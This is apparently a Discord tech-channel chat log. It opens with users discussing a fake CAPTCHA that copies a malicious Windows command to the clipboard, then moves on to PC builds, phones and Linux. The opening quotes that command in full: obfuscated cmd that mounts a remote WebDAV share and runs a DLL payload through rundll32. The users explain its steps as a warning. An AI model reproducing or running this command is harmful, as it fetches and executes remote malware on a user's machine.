Captcha i just encountered
Genuinely insane
It automatically copies a line of text in your clipboard
And it's not just text
I will admit I have no clue what it does but I will NEVER follow through with one of these
DO NOT ACTUALLY RUN WHAT I'M PASTING, IN THE SPOILER I HAVE NO IDEA WHAT IT DOES, THIS IS JUST TO SHOW WHAT IT COPIED INTO MY CLIPBOARD:
||cmd /c start /MIN cmd /c "set x=pushd&set y=popd& call %x% \\ebmoc.yanis.hu@SSL\84f2edcd-8d70-4030-8a65-254afc0cc087 & rundll32 goog.ct,#1 & call %y%"||
it's quite simple:
cmd /c runs the rest of the command and quits
start /MIN starts a new minimized window
set stores the commands in variables instead of calling them outright to evade AV detection
then it connects to a remote WebDAV over SSL share \\ebmoc.yanis.hu@SSL\84f2edcd-8d70-4030-8a65-254afc0cc087
rundll32 runs the dynamic DLL payload even if it's named .ct and not .dll
the last call runs popd to remove the network share and restore everything to its original form
if you ask me it's sus af
Right? Even if it WAS harmless it shouldn't be allowed
The worst part is, this thing appears only after you get past this, just a standard captcha checkbox
Then it hits you with the forced clipboard copy verification
it's fake
you just got clapped with a malware
Nice
PC Master Race
laptop master race......................

PC and Laptop Master Race
I have an okay laptop I guess
Anything that has a keyboard master race
I have a decent laptop
I have a trash pc
The only thing holding my laptop down is a subpar GPU
well I have almost everything top of the line
me too, don't want to have those heavy gaming laptops
My top of the line computer is back home, half a country away from my uni dorm
My mom is too cheapskate to buy me a goddamn killer pc/laptop
You can slowly save up and buy parts every now and then
Save some money by custom-building
But.. im 13
I should sell some vbucks
Ive planned out a couple builds for my future pc
Actually 5
All of them are at 16 gb of ram
8 or 12 gb is more than enough for general usage, unless you are planning on going into graphic arts/rendering etc
- Ryzen 7 2700x ,1070ti
- Ryzen 7 1800x, 1080ti
- I7 8700k, 1070ti
- I7 9700k, 2070
- Ryzen 7 1800x, 2070
Which is the best?
All of em are at 2k budget
i7 8086k obviously
So yeah
I would do 8700k + 2070 personally
I7 8086k is anniversary edition if i remember correctly
Well, 9700k would work as well
8th grade is gonna have sony vegas shit coming
But if its in the future, I wouldn't be going for 1000 series GPUs
9700k and 8700k are basically the same processor
So i might aswell go for an 8 core thing
Also yeah 8086k is the anniversary cpu
Yeah
Using my other phone rn so i couldn't see thhe book marks i have
Their first x86 cpu is 8086
Cout << "hello";
I'm a sucker for limited edition things, so when I upgraded to a new pc, I got the 8086k
Cout.......
print("Bonjour")
Wrong syntax?
I accept only Python
Is that python
yes
C++ masterrace
oh yeah lol
document.write=("hey guys");
Come on people COBOL is teh best programming language
Yeah but once you get deep down into it...
Html is best language ez

Fite me
It's a flower pot
Is it even counted as a computer language
POI API
It's a markup language
It's markup language
Still a language

Oh look they work at EA
I really want that ROG phone...
@wooden geyser Ryzen 7 2700x ,1070ti
Rog phone looks majestic
aws invoke --function-name SayHello outfile [#technology](/guild/456397991847395339/channel/516951507065765888/)
(Guess i join the programmatically-saying-hi meme
)
This is the reason I want that ROG Phone
512gb of storage on board AND a cooler? I could play so many games
Damn
We can play minecraft pe there with 1000 fps XD
I could see my AL girls at 4k
LinusTechTips made a good review about the ROG
Visit https://www.squarespace.com/LTT and use offer code LTT for 10% off GlassWire Firewall: Use code LINUS and get 25% off GlassWire at https://lmg.gg/glass...
For ultimate gacha grinding
Hm wait it has 2 screens?
No, that's a dock
Oh lol
It has a bunch of accessories you need to.pruchase additionally
Also his usual clickbait title
Which most of them I wouldn't get
I'd honestly rather get a switch or decent gaming pc/laptop

Anyhoo, gonna jump out for lunch, ttyl
I don't like those top of the line phones
I mean if you play mobile games a lot, I think it's worth it
I always feel like they just buff the cameras and added unnecessary features
My current phone is an xperia XZ 😛
Ain't you can do split screen in android
I sort of got used to the lack of headphone jacks
At least the ROG phone has one
Only few apps support it
Still would had preferred not buying a Bluetooth set
Meh true
I mean, you could always use the USB dongles
AL+discord split won't do for some reason
I could
But yeah, I'd love being able to play my games without my phone getting hot, and able to charge it while the charger not being in the way of my hand
I usually do it in my bed
My current phone is a mediocre one because I bought it in hurry after I accidentally dropped my old phone into the water
F
Also you can hook up the ROG Phone to the Computer, cause why not
In which way?
^
Sure
Also if ur phone supports MHL you can hook it up to a monitor
LUL

Have we gone full circle?
It needs more cables

Any recommends on improvement or other parts?
Throw bills right into the monitor
Will be my new pc for gaming/streaming
1tb ssd?
I remember ssds being way more expensive per bytes
Jesus a TB for that much. How have things changed.
In general u take an SSD for Windows and then an SSD for other things
Looks pretty good imo
Yeah
My laptop has 256gb ssd but I don't run into space problems yet
Maybe because I don't play big games or have bunch of videos in it
I normaly take my HDD for games and such so this SSD is just mostly because my bf recommended to me getting one xD
That's why I prefer taking an SSD for windows alone
At least this SSD will be free from reading spam
I generally allocate a game I'll be playing often on my SSD while everything else goes on my HDDs
Maybe i'm wrong tho
@gritty kite thats the same i wanted to do too
And when I wanna play game faster I'll buy another SSD for that
But SSD gb per $ is going down, so I don't see why not getting a TB worth of SSD if you can afford it (and is reasonably priced) and it'll satisfy your needs
Damn, back then I bought a 250gig SSD for ~6.5k rub locally, and now I'm seeing around half lower prices (~2.5-3k rub) for the same 250gb SSD's (and not in the local shops)

Meanwhile I live in the dorm and can't have full tower PC setup for a while
Small dorm I imagine
I just don't feel like having big things in it
Today for the same price I could buy ~1tb SSD LUL

@gritty kite Take a 120gb for ur windows and a 1TB for ur games, not like it'll be expensive af to afford another 120
But not like it's a big deal I guess (maybe on long term ?)
Here are mostly gaming laptops
@digital vigil
@digital vigil That's my setup on campus right now lmao
Yeah
Probably going to get a new laptop next year to replace my aging one
Cant wait to get this though lol
Gotta wait for the christmas paycheck and then BAM
I need to enjoy perfection and crispiness
Currently i'm planning to buy some part for my PC since CPU is being 7 years old soon
@sand spruce
@digital vigil
Depends on how many cores and how fast you can go, a CPU can hold out a little longer since most games don't even utilize many cores

looking at you Stellaris
Going to get a Z370 MSI with an i5 8600k and 16gb for my RAM (3000Mhz CL15)

English might be wrong since i'm used to french for that stuff
RTX ON GUYS
Pretty sexy
Later on with more money i'll get dat Watercooling for CPU

that pc is the gaming rig
My current pc can run all new games on medium-high settings but it doesnt fare well will streaming it at the same time, plus my monitor takes too much power also
Surprisingly capable of a little laptop GPU
I have a GTX960 currently
I want a rtx2080ti tho
I also have the workstation that is mostly for work and development
@subtle hawk nee-san is rich
that's also the place @unkempt slate dev environment resides
well being a developer and security specialist does give ou a hefty salary
how much programming or cpu usage does a bot such as z23 take up?
Nice
barely any
My unstable pc
Its all text based so i dont think z23 takes too much
that wild usb dangling there
you gotta process those requests up too
it's not just text
ye it's one of my HDDs
there's a lot behind the scenes

Wouldn't be perfect without a stray wire somewhere imo
it's like a generation or two old my pc is
Damn, this is last year in the school for me, and next year, if I pass the exams and hopefully get into university, I would need to move from my hometown to the city where I'll get into uni and take my PC stuff with me, it's probably gonna be hard
I think i broke nimi that day with chinese text eg / wiki //insert chinese text//
Breaking nimi with non-alphabetical characters
Thx
inb4 @quartz atlas is done for
Just one more year of uni before I'm going to be stuck in a power plant office somewhere

anyway the gaming rig is running a i7-8086K, 32 GB RAM, RTX 2080 Ti and GTX 1080 Ti
WEW
It's fine, it's my ultimate goal in life. I have little interest in circuit design or hardware
whoa, in sli?

overall cost is about 4300€
not in SLI
I forgot what its called, but you can run both card tgt no?
that's what i kinda guessed
1080 is handling hardware acceleration, video decoding and stuff like that
the RTX is for games
display output is on the RTX too?
yes
doe I'm planning to get 2 more displays
I should probably look into the new GPUs they unveiled.
I look at yamato's rig and feel poor
He's flexing on us
well I poured most of my savings into it
my pc is old gen
Good ol 1080, 1440, or 4k for those new displays?
2080ti for 1080p gaming
but I'm thinking of changing to 3 1440
those must be some frame rates man
the main one being 144Hz
That's good stuff
I'm hoping to upgrade to a 1440p on my tower sometime in the future
what's your take on ultrawides tho?

I love ultrawide
My main monitor is 1440p and I have a GTX960 XD
inb4 3 ultrawide monitors
That poor 960
but games are broke with ultrawide
yeah
@gritty kite tis why I get a new pc
no I'm getting 3 normal displays
Oh? I tot Ultrawide makes for awesome experience cuz of the curving and wide FOV?
was debating 1 UW and 2 normal
ahh
I have an Acer Predator 281HBK
just go for 3 16:9's
It takes most of my power
when your display is more expensive than your gpu
@quartz atlas my display 630€ and pc 980€ :'D
I'm right now planning of making a new pc build out of my current gaming rig
is there a channel specific rule list somewhere?
I have 3 displays though, 2 1920×1080 ones and a 3840×1640 ones
@fickle crest thats some weird ratio u have there, but displays are easy to futureproof i guess
Welp here's my workdesk
that's a tiny desk
my corsair mouse just died on me
well mine is big bcz it has to keep 2 gaming pcs on it
That in the middle is the acer
wew nice
i might plan for 3 monitors eventually
@fickle crest are all those displays TN panels?
but i need the room for it
@quartz atlas what do you mean?
TN/LED/OLED
The right one is my Huion Kamvas GT-191 pen monitor
display tech
Ah idk
Huion
i think i got confused
are they any good?
shdl be tn/ips/oled
I ordered a Huion 420 for when I'm with my laptop
but I never used their stuff before
Might try a Huion since I need a cheap graphics tablet
Unlike wacom where you pay 2k for the pen monitor and another 600€ for the holder, you pay 430€ on thag huion or everything
for desktop I have the Wacom intuos pro L
If you want a wacom in the size of my huion
Monitors?
idk I like the precision and feel of wacom tablets
Yes
I have a low end but usable monitor
Its this benq one that i forgot the model name
But yeah if someone wants a good pen monitor for a reasonable price which is -in my opinion - really good go for a huion one. I haven't been dissappointed.
mm, might consider a tablet eventually
What I also need to get though is a wacom mobile studio so I can draw when I am outside
But thats like another PC
Freakin 1.3k for the cheapest
My life long dream
@fickle crest
its good build?
thats very expensive for a 1070ti
@subtle hawk how much does it cost? Also I would need it to run CSP :X
oh god i read the words type cover im triggered
those damn things are so overpriced, my SP3 typec over delaminated and it was like $99 for a SP4 type cover
@stone wave premium products come at a price
My SP3's fan also went at full speed when I was watching a video or browsing the web... other people reported the same thing with their surface products, no idea how it is after the SP4 since I stopped checking.
Replaced mine with an X1 Carbon.
Umm, it does have a fan. - https://www.ifixit.com/Teardown/Microsoft+Surface+Pro+3+Teardown/26595
I remember asking around about the heating and noise and apparently it was normal for the SP3 and SP4, no idea about other models though.
Ah, I see. I was talking about my older model.
Surfaces are so nice
They are pretty neat
Yo what up
@mild geode Pretty nice build, my GPU is 9/10 your price of your build lmao
Anything relationed with Tech
Nice
For some reason is called Technology tho

This is totally wrong
That’s a good speed though
4.8 GHz with a Fan
must be hot af lol
Just cancel your gas bills and use as a heater
are mechanical watches tech?
fine case
@quartz atlas yes
looks cool
aww yiss
how do ya'll feel about the change of materials from steel to silicon in automatics?
tho i think no one would answer
@sick jolt huawei
i can play AL for 5hrs straight and still have enough battery to last the night
and it doesnt ever overheat
wich model?
thats a big battery, i rarely play on my phone but i think mine goes maybe 3 hours
but then i just recharge it back to full in like 30 minutes
nani? 0-100 in 30mins?
oneplus dash charging
iirc it doesnt do 30mins 100%
i dont pay attention to how fast it is tbh
oneplus and oppo is decent
cause when i look away and do something and come back its full
the 6 or 6t is a good sub $1000 option
huawei has the fastest charging on market rn with mate20 pro tho, 40V charging lmao.
if the Motorola E5 Plus can run AL that would be a good budget option (not sure how well it runs it if at all)
cause the e5 is packing a 5000 mah battery
they literally shoved 2 seperate battery packs inside, so they charge both seperately then the phone draws power as if they were one unit.
gotta go out of the way to find a power brick that can supply that much lmao
meh, power is useless if AL doesnt run smoothly or if it overheats
@stone wave huawei includes it for u along with the extraa thicc cable to handle the voltage
just dont loose it lols
but huawei is compatible with quick charge too so
ah thats nice
but then quickcharge aint as quick
OP uses proprietary crap
When Samsung clears their S9/S9+ stock for the next model those might be worth it to nab up.
no no no
wait, sorry. I think i got confused. Supervooc is the 40v charging. Huawei is slightly slower
anything but huawei
why?
infosec?

their OS is extremely bloated
oh are they still using miui?
Not really, I can uninstall most apps tbh. plus its really snappy.
miui is xiaomi
@quartz atlas in your experience
I've had to take apart the Android on Samsung, HTC, Huawei, Xiaomi and Pixel
true, i always rooted my phones and flashed custom firmware before my p20 pro tho.
and out them all ofc the Pixel is the most clean one
thats a given
Samsung one is actually really good for a custom OS
pixel is the best andriod experience hands down
oh, i was gonna shite on touchwiz lul
hahah
i have not used samsung in years
since note 3 iirc
HTC is p bad
or note 4 cant rmb
i cant comment on XM as I have never used it. But my p20 pro is very intuitive with a search bar in the settings all that.
unless you get the Mi A line of phones from Xiaomi
they're god tier
that's a core feature since android 7
or was it 7.1?
oh? oops, i ran my prev custom firmware without updates for 2 years lul
so my new huawei was like blow me away kinda good to me
I have the Android 9 upgrade in beta but I'm not touching it
rn both my phones run Android 8.1
what phones r u using rn?
I take it that u flashed the A1?
oh, did not know that
my friend got himself a A2
can't wait to get my hands on the OS from that
compare it to mine
ASOP differs from device to device?
huh, would have expected them to be close to stock android.
but the kernel and firmware is different along with the device tree
it is stock Android
but you still need that part
the Pixel simply has that baked into the AOSP repository
i see
outside of the firmware
that you still need to get your hands on
unless you run project treble
then you don't need anything
just the OS code
we went from a guy asking what android to buy to android firmwares and kernels lul
and he went away too 😦
true true, most flahships shld be compatible with all carriers nowadays no?
they cover most bandwidths iirc
can it run AL tho
i ran AL on a s820 and it was so shite for some reason
Walmart gaming pc
pls no
Would pay 2k
might have smth to do with me not updating the custom firmware for 2 years but who knows
maby
Run AL on a razer phone
I personally build and make my own ROMs
Max performance right there
@sweet glade nt sure if u trolling
I'll take the ROG phone tyvm
@subtle hawk well..... i just go to xda and see what looks nice and clean luls
@sweet glade absolutely filthy jk
keep for now
i would say maybe grab a 1080 or 1080ti on the cheap 2nd hand if you're really itching in the next few months.
then wait till rtx matures
Okay
keep
Btw, my PC's specs:
Mb: gigabyte ga-ep43-ud3l (this mobo has lots of back panel USB ports instead of parallel and com ports)
Xeon E5450 775 socket mod as a CPU
6 gigs of DDR2 RAM
GPU is Asus GTX 1060 6 GB Dual
And 250gb ssd + 2x2 tb, 1 tb HDDs
Yikes
And yeah, it's old
Typical Xeon modded for a 775 mobo lmao
But runs today's gaems quite well
Still hits hard surprisingly
And for lots of video-related stuff I'm using GPU cuz CPU sucks shit on this
Anyone else a CS major
No
Eh. PC-wise, I'm just running an Inspiron 5575. Ryzen 2500u, 1Tb ssd, 16Gb RAM.

Finally a place where PC master race can dwell
Gotta admit, quickly snatching up a dirt-cheap B350 and a 2200G was probably one of the best choices I've made
Sure I have to sacrifice RGB, but hey, more frames
That board was nearly half off and by the time I got to the store, there was just 1 left in stock.
Quite lucky, you might say.
I was running a xeon e3 1230v2 with a z77 board and 16gb ram for a few years and changed into a ryzen 2700x with x470 and 32gb ram earlier this year
I had been eyeing on the i3-8100 and its ever-increasing price and failed to notice the beckoning of the red team.
Glad I did notice.
HELLO THERE
General Mitsurugi!

Pentium to Ryzen.
ryzen is the best choice atm
agree
for both budget and power
Though I did end up with a slightly defective stock cooler
unless you want extreme gaming performance
2600 is one hell of a beast from what I've read.
well I dont have that kind of need since I only read visual novels
and good games are usually not too graphically heavy
because those prone to get problems
Hope I can replace the cooler soon.
Either through warranty or with an entirely new cooler.
I plan to OC after all.
coolers are cheap
you could use a liquid system
or
open your case and get a BIG FUCKING fan
Don't really have the money for even a cheapo closed loop
its the fan then
Xeon based gaming rigs are a bad idea
expecially is it's very old Xeons on modded boards
I kinda feel bad for my cousin since she got a 950 system mere months before the 1050
Also used a Xeon E3
i also have a friend that got the 970 just before the 1070 launched so yeah
C'est la tech.
well I always based my tech on my needs => running most games on"high" is enough
using 1060 and ryzen 7 atm
what game are you guys playing?
only expecting cyberpunk atm
i am on a 1070 and ryzen 7, and i play random AAA game now like metro, witcher
played all metros and witchers games
good stuffs
100% the first metro and w3
exodus is coming out soon
yeah, and i have been waiting for it for some time now
Ryzen warms my cold heart. Been an AMD man for years, good to see 'em back in a competitive position.
without AMD competing, we may still be on 4 cores
waiting to get my AC7 strangereal box
amd's ryzen are pretty nice now
I need that arsenal bird
AC7 is good stuff
as for games I play now
AL, CS:GO when my friends ask me to, R6, PUBG, League when gf wants to duo
Only place Ryzen's a bit wonky is under Linux. Getting better each microcode and/or kernel upgrade, tho.
VNs are always worth.
AMD microcode is embedded into the Linux kernel
Actually, in linux, there's an amd microcode package.
idk what kind of ancient distro you use that did update their kernel in the last few months
It updates seperately from the kernel, at least in Arch/Arch derivs.
only intel ucode is mandatory on Arch
as for wonkyness
you're running latest kernel
ofc it's not gonna play nice
I'm not arguing mandatory, I'm arguing it exists. As for kernel, it ran worse < 4.17
Probs am late to the topic but
i7-4790 + 16GB ram + GTX960
Is ghe base of my current set up
respectable respectable
keeping the RAM?
I wouldn't recommend touching the RTX cards
xDD
unless you're like me and don't care about price
at least for a couple of years
My current one is still able to play everything on high settings even the new games but due to that Acer monitor i have to put the graphs on medium.
@subtle hawk nope going to build it from new
@sick jolt nope
I am probs going to make a double PC stream setup
First I need to get this rig build xD
@tame topaz bought PS VR just for that game
Nice.
been waiting for this for waaay too long
Well here's hoping VR comes to PC after a year.
Says on the box that VR exclusivity ends on January 18th 2019
So there's hope.
There is hope
Splurged all my money on a PC so oof
Time to shut myself away from the interwebz for 2 weeks once the game comes
@languid saddle real good build?
It's really nice yeah
meanwhile I'm hunting for a 2U chassis for my host server
so I can fit 3.5" drives in it
As someone who hasn't built a desk or server; are 3.5s per sé better, or just cheaper for large amounts
Good to know. I'll keep this kinda thing in mind.
for example a 2.5" 1 TB can cost as much as a 3.5" 4 TB
Micronization cost boost
I'm just glad SSDs are a lot more affordable, in general.
Kinda missing out on StoreMI here, which sucks.
Of course I can always buy FuzeDrive but nah
speaking of storage
I'll need some more for the plex server
gotta prepare for the new anime season
Damn, you work in the biz, or is this just one hell of a personal rig
the biz
Ooh
tfw you realize 1060s sell for dirt cheap due to oversaturation
ikr
I don't blame ya. Hell, had some decent checks a couple months back, so I slipped some loot over for my own upgrades. Still keepin spare in the bank, in case of craziness I can't predict.

Those damn mining dogs never truly let us go
well I didn't mine
but I did invest in crypto
I'm gonna say
it was a damn good investment
but imho GPU miners are dumb
you're better off investing that money into R&D of ASICs
then pay that off once you plug them in
or sell them units
AMD cards here have dipped quite a bit in price too, which is nice.
I remember them going on a draught for a whole year
Lemme guess, bitcoin mining?
Most likely.
Seems to be Intel's turn to have a bit of a chip shortage
Every fucking RTX I see is somehow a mining edition overpriced
Just go Ryzen 3 2200G
Already have it.
Wot
used
Actually, I'd almost like to see ARM get into desktop cpus. If nothing else, a 3rd big player'd keep Intel/AMD on point.
What romanian page is that tho?
it's not romanian
User Romanian mostly?
it just translated to that
Oh
Haven't heard from VIA for a long time now.
I mean VIA is Taiwanese
Wonder how long it'll take for Intel to escape 14nm.
It's having all sorts of consequences for them
Heh. Well, they have the beter RnD budget. Although, AMD's been increasing their fab setup.
meanwhile AMD was the one giving the push in the back
Pretty hyped for Zen 2
Seems like Intel's gonna host an Architecture Event next month
About Arctic Sound
Frankly, both companies doing well pays out for everyone, techwise.
healthy competition is always gud
Indeed.
unlike novideo and refresh technologies group
Not that much of an improvement
"Fuck you, NVIDIA." One of the best Torvalds moments
novideo and their proprietary drivers and firmware
Yep. At least we got amdgpu, on the other side. Nouveau's just ... meh
Heard that AMD stuff ages like fine wine
QFT
on
well you usually stick with something newish
Remember when catalyst on linux was a total ratbastard?
I wish I could counter that. Thank fuck amdgpu's been better, overall.
My board doesn't have any kind of VRM heatsink.
So should I still attempt to OC
Might as well just stick some heatsinks onto there
when the only topic in here is PC parts
We could talk other tech, too.
mine comes with a monoblock attached
im in class rn
'
Freakin' carried this thing home
New gaming rig here I come
It is
heh
oh nice corsair
got so many UPS packages I remember their sticker layout
Was the last one at the pc store in my town. They had to let it delivered from another branch
But I saved 10€ by buying it and carrying home instead of ordering it at alternate
+delivery costs i forgot
Is it a case or an actual rig?
Will I get flamed if I use iPhone
can I complaing about windows crashing in the middle of an exam and them starting an update?
Ryzen support is improving. Which kernel?
Alright. 4-19 series, atm. Doin ok on my own box (Artix). Have you tried either nocbs=0-7 or idle=nomwait kernel options? (Also nocbs can be done by zenstates.py, from within x)
I had no issues for touchscreen past 4-17.
I must say. Most first-time linux users go for one of the "easier" options. Not that I'm judging.
Hmm. What machine? Could have somewhat to do with things.
Damn. I'm running an inspiron 5575
Well. I can tell you android x86 in VirtualBox is a bit wonky ... still workin that out on my end. We have the same APU, though.
I'm full linux. Win10 in a VM.
I'm still living on 2009 with W7 and constant Wi-Fi low signal
My Optical Fiber Router is 20 metres far away my room lmao
Anbox had compilation issues, last I tried it. Could give it another go, tonite.

Geny uses VBox for that vm. If VBox is wonky, Geny'll be the same.
Should I try installing any Android on VBox?
Probably because PC's CPU's Arquitecture are kinda different from the phones, and have to work a lot more
The issue I've been having is most likely related to screen rotation. I'll piss with it later.
What's your GPU?
Also, what version of Android are you using?
I think there's a unofficial version of Android that uses correctly AMD and Intel architectures instead of ARM chips ones
@unborn flicker
isn't for the kind of heart
it's very powerful
but you need to know the ins and outs of linux to harness its potential
if you want to learn linux I suggest starting from
or
True that. Anything Arch-related requires stronk google-fu
Niko. Yer prolly talking about android x86.
Some apps don't act the same on non-arm. FGO being one example that won't even work, iirc
Google-Chan
FGO uses the native Android API to check on what device it runs
if it's not on the list
exit
Makes sense.
So trying to play FGO on a emulated Android is a no no
well
I mean, no "emulated" as well
Playing it on rooted or dev options is also not happening
I wanted to root my Huawei but nowadays that's a really big no no
I don't see any point in rooting
unless you're a madman like me and run debian as a dual boot
oof
Custom roms, bloatware removal.
Man. Haven't done deb in ages.
I think you could modify your phone Kernel having root
Or Samsung. Their roms are cluttered.
better than touchwiz
We don't discuss touchwiz.
Base AOSP is good enough. No idea why OEMs wanna mess with it so damn much.
I personally enjoy the new Samsung ROM
pretty close to AOSP with some nice additions
Haven't done their Bliss bit yet. One thing Sammy could do that'd have me wanting to root a lot less, would be leaving Adoptable Storage in. Put it in DevOps, if yer worried about schlubs fucking up.
dat moment when tech talk gets so much tech talk that you can't add something to it
https://pcpartpicker.com/list/hkq8sZ dis a sicc build (im not gonna build this one btw)
Its too hyperspace for ne
10k x 10k x 8 x 4 is a cool 3GB or so of RAM
Not as bad as when I tried to do an array of 2^32 32-bit ints in Julia
How does an attempt of a few exabytes of memory sound?
yes my system was frozen to the point I had to reboot
I just hope you didn't bash ./Skynet.sh while you were at it.
Thankfully I did not

lurking here hoping to steal see others' PC builds
Was talking Samsung UIs, not programming languages.
oh
honestly my phone is not something I necessarily want to spend time customizing too much
which is why I'm happy with iOS, which is smoother overall
it is, it's better optimized, and background apps are limited
what phone do you have

6S
As much as phones get used, may as well try to customise the hell out of 'em.
I have a 6S and it's smooth
ios loads my games faster
tf you doin
well, I have an SE
which runs the same chipset as the 6S
and yes iOS is simply smoother than android due to the fact that android has to be compatible with more devices
I will say though that if I wanted a ton more customization on my phone I'd 110% take Android
I don't understand why people have this "Apple vs. Android" mentality anyways
sure they're competitors
that doesn't mean you have to fight against consumers of the "other" brand
Use what you feel comfortable with.
I wanna get a new phone someday
ngl maybe I'll try a new android phone for my next device
my last android device I tried was an s6
excluding emulators
*s6 edge
I had an s6 before and it died too soon
buying tablet 🤔
Buying 🤔
Buy
tablet
reminds me, I get to hunt possibly some laptop memory and add a stick to my new machine. maybe. still p. good even if I don't.
what gaming tablet do u guys have
I need to save up a ton and redo my laptop with an nvme SSD
and get rid of all the HP bloatshit that's on there
I don't even know if my laptop's memory is upgradable
I use the Surface Pro as my tablet @rugged glade
not the top spec but it gets the job done
OwO
Wooot samsung galaxy s9 here
Real niggas have Xiaomi
or huawei
Or Meizu
Just gimme a good combo of specs and user-side control, and I can't be arsed to sweat a specific brand.
i personally like huaweis emui interface
but i also liked the custom android roms like cyanogenmods
as for hardware, pretty much anything with samsung exynos or qualcomm snapdragon 800 series is good
Any Chinese brand is fine nowadays
south korean brands are fine as well
except emui runs smoothly compared to the experience i have had with samsungs touchwiz
also more customizable
it was one of the early galaxy models, they didnt have their own exynos cpus back then
it was a flagship galaxy so it wasnt using some bad hardware
A series are considered subflagships
it was s4 or s5 iirc
Also iirc all S-series phones have exynos SoCs
s4/s5 use Exynos for EU and Snapdragon for the muricas
The last one will burn your house down btw
Like the title says
no, the original galaxy s didnt, and neither did s2 nor s3, s4 might have had the exynos but only in korea
